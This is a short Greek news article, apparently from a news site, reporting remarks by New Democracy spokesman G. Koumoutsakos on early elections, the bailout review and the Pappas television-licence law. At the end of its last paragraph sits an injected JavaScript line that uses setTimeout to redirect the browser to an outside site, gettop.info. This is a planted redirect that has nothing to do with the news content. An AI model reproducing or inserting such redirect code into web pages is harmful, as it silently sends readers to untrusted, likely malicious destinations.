Κουμουτσάκος: Η χώρα πηγαίνει από το κακό στο χειρότερο

0
4

 

O εκπρόσωπος Τύπου της Νέας Δημοκρατίας, Γ. Κουμουτσάκος, χαρακτήρισε στάση ευθύνης το αίτημα της αξιωματικής αντιπολίτευσης για προσφυγή στις κάλπες τονίζοντας πως «η χώρα πηγαίνει από το κακό στο χειρότερο», υποστήριξε .

Μιλώντας στην ΕΡΤ, ο κ. Κουμουτσάκος ανέφερε ότι ουδείς μπορεί να αποκλείσει εκλογές το επόμενο διάστημα, 6 έως 8 μήνες, καθώς ο κ. Τσίπρας με την ομιλία του προανήγγειλε πόλωση και διχασμό αλλά και σύγκρουση με τους δανειστές για το χρέος.

Επίσης, εκτίμησε ότι η δεύτερη αξιολόγηση θα είναι δύσκολη. Σημείωσε ότι η Νέα Δημοκρατία είναι κατά των μαζικών απολύσεων γιατί η κοινωνία δεν τις αντέχει. Όσο ναφορά στη συγκρότηση του ΕΣΡ υπογράμμισε ότι η παράταξή του δεν μπορεί να συμμετέχει στη συζήτηση αυτή γιατί θεωρεί ότι είναι κωμωδία, αφού οι ίδιοι άνθρωποι που μας καλούν είναι εκείνοι που του στέρησαν τη δυνατότητα να παίξει τον ρόλο του, όπως προβλέπεται από το Σύνταγμα, για τις άδειες.

Ο εκπρόσωπος Τύπου της ΝΔ επανέλαβε τη θέση του κόμματός του για απόσυρση του νόμου Παππά, προκειμένου να συναινέσει η ΝΔ στη συζήτηση για συγκρότηση του ΕΣΡ. Αναφορικά με τις τηλεοπτικές άδειες έκανε λόγο για «φάρμακο» που είναι δηλητηριώδες για τη δημοκρατία. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here